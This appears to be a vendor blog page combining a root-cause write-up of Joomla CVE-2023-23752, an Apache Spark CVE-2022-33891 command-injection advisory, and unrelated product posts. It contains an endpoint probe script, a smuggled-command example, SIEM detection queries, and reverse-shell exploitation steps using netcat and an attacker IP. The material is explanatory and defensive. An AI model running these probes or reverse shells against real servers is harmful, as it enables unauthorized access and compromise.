
CVE-2023-23752: Joomla Unauthorized Access Vulnerability

Introduction

An unauthorized access vulnerability based on information disclosure in Joomla CMS versions 4.0.0–4.2.7 has been found and registered as CVE-2023-23752.

  • Project: Joomla!

  • SubProject: CMS

  • Impact: Critical

  • Severity: High

  • Probability: High

  • Versions: 4.0.0–4.2.7

  • Exploit type: Incorrect Access Control

  • Reported Date: 2023-02-13

  • Fixed Date: 2023-02-16

  • CVE Number: CVE-2023-23752

What is Joomla CMS?

Joomla is a popular open-source content management system (CMS) that allows users to build websites and online applications. It was first released in 2005 and has since grown to become one of the most widely used CMS platforms in the world, with a large and active community of users and developers.

Joomla is built on PHP and uses a MySQL database to store and manage content. It provides a user-friendly interface for managing content, templates, and extensions, making it easy for users with little technical knowledge to create and manage websites.

Joomla offers a wide range of features and functionalities, including the ability to create multiple user accounts with different levels of access, create and manage custom content types, and support for multilingual websites. It also has a large library of extensions and plugins available, allowing users to add new features and functionality to their websites.

Joomla is free to use and distribute, and it is licensed under the GNU General Public License. Its open-source nature has contributed to its popularity and has allowed it to evolve over time, as the community continues to contribute to its development and improvement.

Build the lab

Install the system and prerequisites

  • Set up Ubuntu (I’m using Ubuntu Server 20.04)

  • Update the server
     sudo apt update

  • Install Apache
     sudo apt install apache2

  • Start the Apache service
     sudo systemctl start apache2

  • Check the status of the Apache service
     sudo systemctl status apache2

  • Install PHP modules
    sudo apt install php php-xml php-mysql php-mbstring php-zip php-soap php-sqlite3 php-curl php-gd php-ldap php-imap php-common

  • Install MySQL
     sudo apt install mysql-server

  • Configure the database

mysql -u root -p
create database joomla;
use joomla;
create user 'user'@'localhost' identified by '123456';
grant all privileges on joomla.* to 'user'@'localhost';
flush privileges;
exit
  • Create a directory for Joomla

cd /var/www/
mkdir joomla
cd joomla
  • Download Joomla

wget https://downloads.joomla.org/cms/joomla4/4-2-6/Joomla_4-2-6-Stable-Full_Package.zip?format=zip
  • Unzip the folder
    unzip 'Joomla_4-2-6-Stable-Full_Package.zip?format=zip'

  • Configure the permissions

chown -R www-data:www-data .
chmod -R 755 .
  • Create virtualhost

vim /etc/apache2/sites-available/joomla.conf

<VirtualHost *:80>

    ServerName www.mhzcyber.com
    DocumentRoot /var/www/joomla/

</VirtualHost>
  • Disable the default site
    sudo a2dissite 000-default.conf

  • Enable the Joomla site
     sudo a2ensite joomla.conf

  • Enable the rewrite module
    sudo a2enmod rewrite

  • Restart the Apache service
    sudo systemctl restart apache2

  • Now browse to the server’s IP address or domain name

  • Click “Open Administrator” and log in

Background Story

What I’m trying to achieve here is an understanding of the software flow: how it works, how the vulnerable endpoint gets processed, why setting the public parameter to true returns all this data, and finally where this data comes from.

What did I do?

Basically, I started by reproducing the vulnerability, and from there I went on to static analysis. But when I got to the route() function, I needed a better understanding of the flow, so I started debugging the software and following it step by step.
I explain the authentication bypass and where the config data came from; that part made me go back and debug from the beginning, starting with index.php, so we understand how the data gets loaded. Finally, I explain how this data gets sent, i.e. the response.

Reproduce the vulnerability

Browse the following path:

api/index.php/v1/config/application?public=true

Here we can see the leaked information, including all the database configuration data.

This allows access to the database if it can be reached remotely. If a malicious actor gains access to the internal network, they will be able to access the database, and from there they can mount multiple attacks, such as accessing other accounts inside the company, spear phishing, privilege escalation, etc.
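As a sketch of reproducing this from the command line, the probe below requests the vulnerable endpoint using Python’s standard library. Only the endpoint path and the public=true parameter come from the write-up; the base URL and the helper names (build_probe_url, probe) are illustrative.

```python
# Minimal probe sketch for CVE-2023-23752 against a lab instance.
# Hypothetical target URL; only the path below comes from the article.
import json
import urllib.request

API_PATH = "/api/index.php/v1/config/application?public=true"

def build_probe_url(base_url: str) -> str:
    """Append the vulnerable config endpoint to a target base URL."""
    return base_url.rstrip("/") + API_PATH

def probe(base_url: str) -> dict:
    """Request the endpoint and decode the JSON:API response."""
    with urllib.request.urlopen(build_probe_url(base_url), timeout=10) as resp:
        return json.loads(resp.read().decode())

# Example usage (requires a vulnerable lab instance):
# data = probe("http://192.168.56.10")
# for item in data.get("data", []):
#     print(item.get("attributes"))   # db host, user, password, etc.
```

On a vulnerable install, the JSON response’s attributes include the database connection settings from configuration.php.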

Before we get into the static analysis, I added the methods that I went through during the debugging and the analysis trying to build a flow to make understanding this easier.

Static Analysis

Check the directory of Joomla and you can find configuration.php

I started to search for the following keywords:

  • configuration.php

  • JConfig

  • the keywords existed in the configuration file

I found that there is an installation folder containing “ConfigurationMode.php”; basically, the purpose of this code is to create and populate the configuration file.

I was wondering, though: how does this get processed? In other words, where can I see what happens when we set the public parameter to true?

First thing let’s check api/index.php 

Now let’s follow '/includes/app.php' 

After reading the code here, the comments alone are enough to make sense of it (the details aren’t really relevant). The most interesting part is the execute() function.

I followed this and I found the execute() function in CMSApplication.php

I needed to study this function and whatever functions it calls; basically, this function contains the high-level logic for executing the application.

I started to check the first 4 functions.

  • sanityCheckSystemVariables()

This method checks for any invalid system variables that may cause issues during the application’s execution and unsets them. If there are any invalid system variables, it aborts the application.

  • setupLogging()

This method sets up the logging configuration for the Joomla CMS application. It checks the application configuration for various logging-related settings and configures loggers accordingly.

  • createExtensionNamespaceMap()

This method allows the application to load a custom or default identity by creating an extension namespace map.

  • doExecute()

When I tried to follow this function, first I got to here:

After that I found the main function here:

It starts with initialiseApp() which basically loads the language, sets some events, and listeners. i.e. Initialize the application.

So, from the called and used functions here the one that got my attention is route()

You can find the route() function at the following path:

libraries/src/Application/ApiApplication.php -> route()

protected function route()
    {
        $router = $this->getContainer()->get(ApiRouter::class);

        // Trigger the onBeforeApiRoute event.
        PluginHelper::importPlugin('webservices');
        $this->triggerEvent('onBeforeApiRoute', array(&$router, $this));
        $caught404 = false;
        $method    = $this->input->getMethod();

        try {
            $this->handlePreflight($method, $router);

            $route = $router->parseApiRoute($method);
        } catch (RouteNotFoundException $e) {
            $caught404 = true;
        }

        /**
         * Now we have an API perform content negotiation to ensure we have a valid header. Assume if the route doesn't
         * tell us otherwise it uses the plain JSON API
         */
        $priorities = array('application/vnd.api+json');

        if (!$caught404 && \array_key_exists('format', $route['vars'])) {
            $priorities = $route['vars']['format'];
        }

        $negotiator = new Negotiator();

        try {
            $mediaType = $negotiator->getBest($this->input->server->getString('HTTP_ACCEPT'), $priorities);
        } catch (InvalidArgument $e) {
            $mediaType = null;
        }

        // If we can't find a match bail with a 406 - Not Acceptable
        if ($mediaType === null) {
            throw new Exception\NotAcceptable('Could not match accept header', 406);
        }

        /** @var $mediaType Accept */
        $format = $mediaType->getValue();

        if (\array_key_exists($mediaType->getValue(), $this->formatMapper)) {
            $format = $this->formatMapper[$mediaType->getValue()];
        }

        $this->input->set('format', $format);

        if ($caught404) {
            throw $e;
        }

        $this->input->set('option', $route['vars']['component']);
        $this->input->set('controller', $route['controller']);
        $this->input->set('task', $route['task']);

        foreach ($route['vars'] as $key => $value) {
            if ($key !== 'component') {
                if ($this->input->getMethod() === 'POST') {
                    $this->input->post->set($key, $value);
                } else {
                    $this->input->set($key, $value);
                }
            }
        }

        $this->triggerEvent('onAfterApiRoute', array($this));

        if (!isset($route['vars']['public']) || $route['vars']['public'] === false) {
            if (!$this->login(array('username' => ''), array('silent' => true, 'action' => 'core.login.api'))) {
                throw new AuthenticationFailed();
            }
        }
    }

Why is this function interesting? Because it routes the application, and routing is the process of examining the request environment to determine which component should receive the request. The component’s optional parameters are then set in the request object to be processed when the application is dispatched.

Debugging

From here I started debugging, since it was getting hard to understand the flow from static analysis alone.

Set the debugger

I’m using PhpStorm with Xdebug, on an Ubuntu desktop.

Just download PhpStorm and start it.

After that, install this extension in Chrome:

Xdebug helper

Link: https://chrome.google.com/webstore/detail/xdebug-helper/eadndfjplgieldjbigjakmdgkmoaaaoc

After you install it, go to the link, click on the extension, and click Debug.

Now you will get a message in PhpStorm that there is an incoming request.

NOTE: you may need to restart the Chrome browser.

You can follow this video for more information:

https://youtu.be/3idASlzGTg4

As with debugging and reverse engineering a binary program, you would usually set a breakpoint on the main function. We will do the same here: in our case index.php can be considered the main, and it starts by running app.php, through which all executable code is triggered.

Understand how the data gets loaded

While stepping into the program, you will notice line 25 in app.php, where it includes framework.php.

We can see here that there is a pre-loaded configuration and it’s going to load it.

Now in configuration.php we can see all of it.

Here we can see that the data in configuration.php got assigned to the variable $config.

Here I have listed the important methods that I noticed the program going through.

NOTE: these are not all the methods/functions, but they are the most obvious ones and clarify how the flow works.

route()

  • getContainer()

    This will get the DI container and prepare it.

    In Joomla CMS, a Dependency Injection (DI) container is a software component that manages the instantiation and dependency resolution of objects in the application. It is a design pattern that allows developers to write modular, decoupled, and reusable code.

    Joomla’s DI container is provided by the joomla/di Framework package, which offers a simple and flexible way to manage object dependencies in a Joomla application. The DI container is used to instantiate and manage objects and to inject dependencies into them.

  • getMethod()

    This method gets the HTTP request method.

    When you follow it, you will notice it goes into the __get() function, and we can see that the $method variable is set to GET.

  • handlePreflight()

This handles preflight requests. A preflight request is a small request sent by the browser before the actual request. It contains information such as which HTTP method will be used and whether any custom HTTP headers are present. The preflight gives the server a chance to examine what the actual request will look like before it is made.

Basically, it checks whether this is an OPTIONS request and whether CORS is enabled; if not, it does nothing.

  • parseApiRoute()

This method parses the given route and returns the name of a controller mapped to it.

It requires a method parameter, the request method to match: one of GET, POST, PUT, DELETE, HEAD, OPTIONS, TRACE, or PATCH.

It returns an array containing the controller and the matched variables. If something goes wrong, it throws an InvalidArgumentException, the exception thrown when an inappropriate argument is passed to a function, e.g. an unexpected data type or invalid data.

  • getRoutePath()

This method will get the path from the route and remove any leading or trailing slash.

This method uses getInstance(), which returns the global Uri object (creating it only if it doesn’t already exist), and getPath(), which gets the URL path string. Here are the values of both:

Now back to parseApiRoute(), we have this line

$query = Uri::getInstance()->getQuery(true);

and this retrieves the parameter public with its value true
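To see why the value itself matters later, here is a quick illustration of how a query string parses into string values. Python stands in for PHP here, but PHP’s query parsing behaves the same way in this respect: every value arrives as a string.

```python
# Illustration: query-string values are always strings, so "public=true"
# yields the string "true", never a boolean true.
from urllib.parse import parse_qs, urlparse

url = "http://target/api/index.php/v1/config/application?public=true"
query = {k: v[0] for k, v in parse_qs(urlparse(url).query).items()}

print(query)  # {'public': 'true'} -- a string, not a boolean
```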

After that, it iterates through all of the known routes in a for loop looking for a match, and here we can see the matches.

From there going back to route()

and you can see that all the variables are set.

Now it will trigger an event which means it will get the event name ‘onAfterApiRoute’ and it will set some values.

$this->triggerEvent('onAfterApiRoute', array($this));

Understand the authentication bypass

After that, we get to the if statement, which checks whether the 'public' key in the $route variable is not set or its value is false. In that case, the code attempts to log in the user by calling the $this->login() method with two parameters: an array with an empty username, and an array containing two additional options: 'silent' => true and 'action' => 'core.login.api'.

If the login fails, the code throws an AuthenticationFailed exception.

But if the 'public' key is set in the $route variable, the first part of the if condition evaluates to false, and because the value arrives from the query string as the string 'true' rather than the boolean false, the strict comparison === false fails as well. This means the code inside the if block is not executed, and the user is not required to log in.

Therefore, if 'public' is set to true, the user can access the route without authentication.

This is why we can bypass the authentication: no authentication is required to access the data.
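The guard at the end of route() can be transcribed into a few lines of Python to make the logic testable. This is a sketch of the condition, not Joomla code; the function name is illustrative.

```python
# Sketch of the guard at the end of ApiApplication::route(), transcribed to
# Python to show why any value for "public" skips the login call.
def requires_login(route_vars: dict) -> bool:
    # Mirrors: if (!isset($route['vars']['public']) || $route['vars']['public'] === false)
    return "public" not in route_vars or route_vars["public"] is False

# public comes from the query string, so it arrives as the *string* "true";
# the strict === false comparison never matches a non-empty string.
assert requires_login({}) is True                        # no parameter: login enforced
assert requires_login({"public": False}) is True         # real boolean false: login enforced
assert requires_login({"public": "true"}) is False       # string "true": login skipped
assert requires_login({"public": "anything"}) is False   # any other value also skips it
```

Note that the last assertion shows the check is not really "is public true?" but "is public anything other than unset or boolean false?", which is the root cause of the bypass.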

Understand where the config data came from

Now going back to the doExecute() function, we reach the dispatch() method.

When I got here I was still trying to understand how the data gets retrieved, and while stepping into the dispatch() method, I got here:

As you can see, the $component variable is set to “config”, so I started to follow config and found the following:

libraries/vendor/joomla/application/src/AbstractApplication.php

This is what pushed me to go back to the beginning and start debugging from index.php to understand how the data gets loaded.

Note: the $config variable and its data are already assigned, as we saw in the “Understand how the data gets loaded” section.

Understand how this data gets sent

Now we need to understand how this data gets sent.

Going back to dispatch(): basically, it is responsible for rendering a particular component (specified by $component or via the ‘option’ HTTP GET parameter) and setting up the associated document buffer, while also triggering a plugin event after the component has been dispatched.

Back in execute(), it renders the output. Rendering is the process of pushing the document buffers into the template placeholders, retrieving data from the document, and pushing it into the application response buffer; here you can see the program set and prepare the body content.

After that, the respond() method is called; it prepares the headers and the response to be sent.

Then it triggers the onAfterRespond event, which marks the end. One last touch is to shut down the registered handler for PHP fatal errors using the handleFatalError() function, and you will notice it goes to DatabaseDriver.php’s __destruct() to disconnect from the database.

Mitigation

Upgrade to Joomla version 4.2.8 or later.

Final Thoughts

This was a really hard one to debug and analyze, because of the way Joomla CMS is developed: it is broken into small components, methods, etc., and each request goes through many loops that break it down, pass the input through regex checks, and initialize all the components/variables needed for that request.

The explanation here was not a straightforward step-by-step walk; there is some going back and forth in the analysis, and that is intentional, since I wanted to give you a window into what I went through during the analysis.

I believe it would be hard to really understand the whole flow, not only the vulnerability itself but the program as a whole, without debugging it yourself and stepping through it. However, I tried to give a general overview and go into more detail on the root cause of the vulnerability itself.


About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Topia
TOPIA is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

Apache Zero Days – Apache Spark Command Injection Vulnerability (CVE-2022-33891)

Component Name:

Apache Spark

Affected Versions:

Apache Spark ≤ 3.0.3

3.1.1 ≤ Apache Spark ≤ 3.1.2

3.2.0 ≤ Apache Spark ≤ 3.2.1

Vulnerability Type:

Command Injection

CVSSv3:

Base Score:                                    8.8 (High)

Attack Vector:                                 Network

Attack Complexity:                             Low

Privileges Required:                           None

User Interaction:                              None

Confidentiality Impact:                        High

Integrity Impact:                              High

Availability Impact:                           High

Remediation Solutions:

Check the Component Version:

Run the spark-shell command; the version information will be displayed.

 

Apache Solution

Users can update their affected products to the latest version to fix the vulnerability:

https://spark.apache.org/downloads.html

How does it work?

The command injection occurs because Spark checks the group membership of the user passed in the ?doAs parameter by using a raw Linux command.

User commands are processed through the ?doAs parameter, and nothing is reflected back on the page during command execution, so this is blind OS command injection. Your commands run, but there will be no indication of whether they worked, or even of whether the program you are running exists on the target.

OS commands passed in the ?doAs URL parameter trigger a background Linux bash process, spawned via cmdSeq, that runs the command line id -Gn. Seeing bash run with id -Gn is a good indicator that your server is vulnerable or already compromised.

If an attacker sends reverse shell commands, there is also a high chance of the Apache Spark server granting access to the attacker’s machine.

private def getUnixGroups(username: String): Set[String] = {
  val cmdSeq = Seq("bash", "-c", "id -Gn " + username)
  // we need to get rid of the trailing "\n" from the result of command execution
  Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet
}

Vulnerable source code: https://github.com/apache/spark/pull/36315/files#diff-96652ee6dcef30babdeff0aed66ced6839364ea4b22b7b5fdbedc82eb655eeb5L41

 


Vulnerable component

http://<IP_address>/?doAs=`[command injection here]`



getUnixGroups is a private method written in Scala. It takes a single String argument called username and returns a Set of Strings representing the groups that the user belongs to on a Unix-like system.

 

The method first constructs a Seq of Strings that represents a shell command to retrieve the user’s group information using the id command. The cmdSeq variable is set to this sequence, with the username parameter concatenated to the end of the command using string concatenation.

 

Next, the executeAndGetOutput method of the Utils object is called with cmdSeq as its argument. This method executes the shell command represented by the cmdSeq sequence and returns the output of the command as a string.

 

The output of the executeAndGetOutput method is then processed to remove the trailing newline character using the stripLineEnd method. The resulting string is then split into an array of strings using the split method and converted into a Set using the toSet method. This Set of strings represents the user’s group membership.
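That post-processing can be sketched in Python to see what the method returns for a typical id -Gn output (the group names below are made up for the example):

```python
# Sketch of the Scala post-processing: strip the trailing newline, split on
# spaces, and collect the group names into a set. Sample output is made up.
raw_output = "adm cdrom sudo\n"          # what `id -Gn <user>` might print
groups = set(raw_output.rstrip("\n").split(" "))
print(groups == {"adm", "cdrom", "sudo"})  # True
```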

 

    val cmdSeq = Seq("bash", "-c", "id -Gn " + username)

 

The getUnixGroups method constructs a shell command by concatenating the username parameter with the id command. The username parameter is not properly sanitized or validated, which means that an attacker could potentially inject malicious code into it and execute arbitrary commands on the underlying operating system.

 

For example, if an attacker were to supply a username parameter of “; echo hacked > /tmp/hacked”, the resulting shell command would be “id -Gn ; echo hacked > /tmp/hacked”. When this command is executed by the executeAndGetOutput method, it would execute the id command and then execute the echo command, which writes the string “hacked” to the file /tmp/hacked. This would give the attacker arbitrary code execution on the underlying operating system.
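The flaw, and what the fix looks like, can be reproduced locally with a harmless payload. The Python sketch below mirrors the Scala code’s bash -c string concatenation and contrasts it with passing the username as a single argv entry; the function names are illustrative, and it requires a Linux system with bash and id available.

```python
# Local demonstration of the concatenation flaw: building a shell string lets
# ";" start a second command, while an argument list never goes through a shell.
import subprocess

def groups_vulnerable(username: str) -> str:
    # Analogous to Seq("bash", "-c", "id -Gn " + username): the username is
    # spliced into a shell command line and parsed by bash.
    out = subprocess.run(["bash", "-c", "id -Gn " + username],
                         capture_output=True, text=True)
    return out.stdout

def groups_safe(username: str) -> subprocess.CompletedProcess:
    # Argument list: the username is a single argv entry, never shell-parsed.
    return subprocess.run(["id", "-Gn", username],
                          capture_output=True, text=True)

payload = "; echo INJECTED"
print("INJECTED" in groups_vulnerable(payload))       # True: second command ran
print("INJECTED" in groups_safe(payload).stdout)      # False: treated as a (bad) username
```

This is essentially the shape of the upstream fix as well: stop handing attacker-controlled input to a shell and pass it as a discrete argument instead.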


Detection & Response:

The vulnerability allows an attacker to reach a permission-check function that builds a Unix shell command from their input, which is then executed by the system. This can result in arbitrary shell command execution with the privileges of the Spark process, potentially leading to complete compromise of the affected system.

The Apache Spark command injection vulnerability (CVE-2022-33891) is a serious security issue that can allow an attacker to execute arbitrary code with the privileges of the Spark process, potentially leading to complete compromise of the affected system. It is important for organizations using Apache Spark to be aware of this vulnerability and take steps to detect and respond to it.

One way to detect the vulnerability is to monitor for suspicious activity on the affected system. This can include monitoring for unexpected system or network behavior, such as unusual network traffic or system resource usage. It can also include monitoring for malicious activity, such as attempts to execute unauthorized code or access restricted resources.

Another way to detect the vulnerability is to use security tools and technologies, such as intrusion detection systems (IDS) and vulnerability scanners, to identify potential vulnerabilities and security issues on the system. These tools can help to identify and alert on potential security threats, allowing organizations to take appropriate action to mitigate the risk.

Once the vulnerability has been detected, it is important to take swift action to respond to the issue. This may include isolating the affected system to prevent further compromise, implementing temporary fixes or workarounds, and deploying a patch or update to address the issue. It is also important to conduct a thorough investigation to determine the root cause of the vulnerability and implement measures to prevent similar issues from occurring in the future.

Splunk:

index=* c-uri="*?doAs=`*"
index=* (Image="*\\bash" AND (CommandLine="*id -Gn*"))

Qradar:

SELECT UTF8(payload) from events where LOGSOURCENAME(logsourceid) ilike '%Linux%' and "Image" ilike '%\bash' and ("Process CommandLine" ilike '%id -Gn%')

SELECT UTF8(payload) from events where "URL" ilike '%?doAs=`%'

Elastic Query:

url.original:*?doAs\=`*
(process.executable:*\\bash AND process.command_line:*id\ \-Gn*)

Carbon Black:

(process_name:*\\bash AND process_cmdline:*id\ \-Gn*)

FireEye:

(process:`*\bash` args:`id -Gn`)

GrayLog:

(Image.keyword:*\\bash AND CommandLine.keyword:*id\ \-Gn*)
c-uri.keyword:*?doAs=`*

RSA Netwitness:

(web.page contains '?doAs=`')
((Image contains 'bash') && (CommandLine contains 'id -Gn'))

Logpoint:

(Image="*\\bash" CommandLine IN "*id -Gn*")
c-uri="*?doAs=`*"

 

Technical Detail:

  1. First, clone the exploit Python script from the GitHub repository onto your local machine using the command below.

```
git clone https://github.com/devengpk/Apache-zero-days.git
```

  2. Make sure the target Apache Spark server is up, so we can test whether this self-hosted server is vulnerable.

  3. Now, let’s check whether the target is vulnerable using the command below.

```
python3 exploit.py -u http://<server-ip> -p 8080 --check --verbose
```

  4. From the above command’s result, we found that the scanned target is vulnerable. Now let’s use the exploit to get a reverse shell with the command below.

```
python3 exploit.py -u http://<Server-IP> -p 8080 --revshell -lh <Attacker-IP> -lp 9001 --verbose
```

  5. Before triggering the reverse shell, start a netcat listener to catch it, using the command below.

```
nc -nvlp 9001
```

  6. With the netcat listener running, execute the reverse shell command above; you will get a reverse shell and can execute your desired commands on the target server.

Reference:

  • Exploitation payload: https://github.com/devengpk/Apache-zero-days
  • Vulnerable source code: https://github.com/apache/spark/pull/36315/files#diff-96652ee6dcef30babdeff0aed66ced6839364ea4b22b7b5fdbedc82eb655eeb5L41


#Apache #Apache_Spark #CVE-2022-33891


Critical Infrastructure’s Silent Threat: Part 2 – Understanding PLCs

Part 2: Decoding the Complexity of PLCs

In part one of this series we explained how Programmable Logic Controllers (PLCs) have become key targets for cyber security attacks due to their legacy design, lack of built-in security features, and susceptibility to malware, and how newer PLCs are starting to incorporate more robust security features to help protect against these threats.

Before we can understand how PLCs can be targeted in attacks, we need to understand what they are, how they work and what can be targeted.

Continue reading

Utah Passes Law Requiring Parental Consent for Minors on Social Media: How DNS Filtering Can Help Protect Children Online

Utah has passed a new law that requires parental consent for minors to use social media. The law aims to protect children from potential harm and social media addiction, but critics argue it could be difficult to enforce and limit free speech. The law will take effect in March 2024 and could set a precedent for other states.

Under the new law, social media companies must obtain consent from parents or legal guardians of minors before collecting, storing, or using their personal information. The law also requires social media platforms to provide an option for parents to access and delete any information their children have shared on the platform.

Parental controls with DNS filtering are a type of internet filter that parents can use to limit their children’s access to certain websites and online content. This type of filter works by using a DNS (Domain Name System) server to redirect requests for specific websites or types of content to a block page or a filtered version of the website.

DNS filtering can be a useful tool for parents who want to protect their children from online threats such as inappropriate content, cyberbullying, and phishing attacks. It can also be helpful in managing screen time and limiting access to specific websites or online activities during certain times of the day.

Some parental control solutions that use DNS filtering also offer additional features such as content categorization, which can automatically block access to websites in certain categories such as gambling, drugs, or adult content. These solutions can also allow parents to create individual profiles for each child and set customized filtering rules based on their age and maturity level.

Overall, parental controls with DNS filtering can be an effective way for parents to protect their children from online dangers and promote safe and responsible internet use.

To ensure compliance with the new law and provide the first layer of protection for children online, start your free trial here.

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About SafeDNS
SafeDNS breathes to make the internet safer for people all over the world with solutions ranging from AI & ML-powered web filtering, cybersecurity to threat intelligence. Moreover, we strive to create the next generation of safer and more affordable web filtering products. Endlessly working to improve our users’ online protection, SafeDNS has also launched an innovative system powered by continuous machine learning and user behavior analytics to detect botnets and malicious websites.

Blazing New Trails In Keeping Your Network Safe

Not to brag, but 2022 was a banner year for us here at Portnox!  Not content with just having an award-winning cloud-native zero trust platform, we had several major releases that continue to raise the bar for zero trust solutions everywhere.

Tackling TACACS+ – as a Service!

How do you keep network device administration from turning into a nightmare of changing password policies, too many people having too much access, and risking constant device lockouts?

TACACS+, of course! After all, it’s the industry standard for making device access manageable.

Portnox released the first ever cloud-native TACACS+ service, which combines Authentication, Authorization, and Accounting (AAA) services with all the benefits of a fully cloud-native platform – e.g. we work with the equipment you have, and no nights wasted for upgrades and patches.

Our TACACS+ service offers seamless integration with your existing identity provider, as well as key features like privilege levels and executed command logging to make network device administration simpler than ever.

TACACS Diagram

Shining a Light on the Shadows: IoT Fingerprinting

IoT (Internet of Things) devices are inescapable at this point – everything from your fish tank to your fridge can connect to the internet.  The use cases for these devices span many industries – from IoMT (Internet of Medical Things) which can monitor your health and adjust medication in real-time, to IIoT (Internet of Industrial Things) which can track inventory down to the smallest screw in seconds, to the more familiar consumer IoT which lets you control your window blinds, thermostat, lights, and more from your phone.

But as useful as these devices are, they present an equal number of security concerns, chief among them being visibility. That’s to say – how do you know when they’re connected to your network?


Enter IoT Fingerprinting from Portnox – the first ever cloud-native fingerprinting service that requires no on-prem installation or setup whatsoever!  No more having to watch your network slow to a crawl while running a port scanner, or painstakingly troubleshooting how to deploy a listener. You will see your IoT devices and all the information you need – make, model, OS, firmware – and still maintain the magic of a cloud-native solution with no upgrades, patches, or maintenance taking up your free time.


What’s our secret? DHCP Gleaning! This is a process by which the switch listens in on the DHCP request a device sends when it joins the network to ask for an IP, extracting information from the request that helps identify the device. Many enterprise switches support this (although they may not call it gleaning specifically; that’s actually a Cisco term).
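To see what kind of information a DHCP request carries, here is a minimal sketch (illustrative only, not Portnox’s actual implementation) of parsing the TLV-encoded options field defined in RFC 2132. Fingerprinting commonly keys on option 60 (vendor class identifier) and option 55 (parameter request list), whose contents and ordering are often device-specific:

```python
def parse_dhcp_options(options: bytes) -> dict:
    """Parse the TLV-encoded options field of a DHCP packet (RFC 2132):
    one tag byte, one length byte, then that many value bytes, repeated.
    Tag 0 is padding; tag 255 marks the end of the options."""
    out, i = {}, 0
    while i < len(options):
        tag = options[i]
        if tag == 255:          # 'end' option
            break
        if tag == 0:            # padding byte, no length field
            i += 1
            continue
        length = options[i + 1]
        out[tag] = options[i + 2:i + 2 + length]
        i += 2 + length
    return out
```

An option-60 value such as b"udhcp 1.33.1", for example, would hint at an embedded Linux device even before any other probing.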

DHCP Goes Even Further

While DHCP Gleaning is an excellent method of gathering critical information about your IoT devices, the downside is that not all enterprise switches support it. And that’s another tricky thing about IoT devices – they don’t respond to traditional monitoring protocols, they often ship with all ports closed, and you can’t install extra software on them. So how do you discover and fingerprint them on your network if you can’t take advantage of DHCP gleaning?

Enter another first – Portnox’s SaaS-based DHCP listener! This makes IoT Fingerprinting truly vendor agnostic, as any switch worth its salt will be able to configure a DHCP helper (sometimes called a DHCP relay agent or forwarder). With a simple configuration, your network device will listen for DHCP and BOOTP broadcasts and forward them to our DHCP listener. And when we say simple configuration, we mean it – here’s a sample from a Cisco IOS router:

Router> enable
Router# configure terminal
Router(config)# interface vlan2
Router(config-if)# ip helper-address 20.85.253.96

Just 4 simple lines and you’re ready to go. Most devices support the configuration of more than one listener, too, so if you already have one set up for something else you can still take advantage of our cloud-based listener.

Wearing Shades for the Future

We’re pretty proud of these features, but we obviously have no intention of resting on our laurels.  We have a lot of exciting things planned for 2023 to continue our commitment to protecting your weekends from maintenance and upgrades with a cloud-native, vendor-agnostic, feature-rich, zero trust, network access control platform.


About Portnox
Portnox provides simple-to-deploy, operate and maintain network access control, security and visibility solutions. Portnox software can be deployed on-premises, as a cloud-delivered service, or in hybrid mode. It is agentless and vendor-agnostic, allowing organizations to maximize their existing network and cybersecurity investments. Hundreds of enterprises around the world rely on Portnox for network visibility, cybersecurity policy enforcement and regulatory compliance. The company has been recognized for its innovations by Info Security Products Guide, Cyber Security Excellence Awards, IoT Innovator Awards, Computing Security Awards, Best of Interop ITX and Cyber Defense Magazine. Portnox has offices in the U.S., Europe and Asia. For information visit http://www.portnox.com, and follow us on Twitter and LinkedIn.

Find out for yourself what telemetry is

Here at the Pandora FMS blog we like to get up early, prepare a cup of pennyroyal mint tea and, while it steeps, do a couple of stretches, wash our faces and start the day by defining strange words for our readers. Today it’s time for: telemetry!

Do you already know what telemetry is? Today we will tell you

Shall we get straight to the point?

Straight to the point then it is!

Telemetry, roughly speaking, is the automatic measurement, collection and transmission of data from remote sources, carried out by data-collecting devices.

That data is then transmitted to a central location where it is analyzed, at which point you may consider your remote system supervised and controlled.

Of course, telemetry data helps you keep security under control while also improving customer experience and monitoring application status, quality and performance.

But let’s go further, what is the true purpose of telemetry?

As can be understood, the collection of telemetry data is essential to manage IT infrastructures.

Data is used to monitor system performance and keep actionable information on hand.

How do we measure telemetry?

Easy-peasy! 

Through monitoring!

Monitoring tools measure all types of telemetry data. 

They start with server performance and head towards actionable infinity.

Some types of telemetry data

It all starts with a small signal that indicates whether a server is active or inactive.

Then it tends to get complicated. 

Event and metric data already includes the CPU utilization of a server, including peaks and averages over different periods. 

For example, a type of telemetry data to be monitored includes server memory utilization and I/O loading over time.

This data is particularly important when using server virtualization.

In these situations, statistics provided by virtual servers may not reveal problems with CPU or memory utilization; instead, the underlying physical server may be underutilized in terms of physical memory, virtualization, CPU, and I/O connectivity with peripherals.

Finally, user requests over time and concurrent user activity on standard deviation charts should be included in server-specific metrics.

This will reveal how your systems are being used in general, as well as information about server performance.

Telemetry Data Monitoring

Now that we’ve taken a look at servers and their telemetry, let’s dig a little deeper into some of the fundamental components of their physical application.

This includes:

  • Network infrastructure.
  • Storage infrastructure.
  • Capacity.
  • Overall bandwidth consumption.

As any experienced IT professional can warn you:

Quantifying network monitoring beyond the strictly commonplace is important.

Measuring network traffic in bits per second across LANs and sub-LANs within your application infrastructure should always be part of monitoring network utilization.

To predict when packets will be lost and when storms may take place in your network, it is essential to understand the theoretical and practical limits of these segments.

Network monitoring must reveal how each segment’s bandwidth is utilized over time across multiple network areas.

Monitoring certain network protocols will also provide a more detailed view of application usage in real time and, perhaps, of performance issues for certain features.

Likewise, monitoring requests to certain network ports can also reveal any security gaps, as well as routing and switching delays in the relevant network components.

In addition to monitoring raw network usage, it is necessary to monitor the storage systems connected to the network.

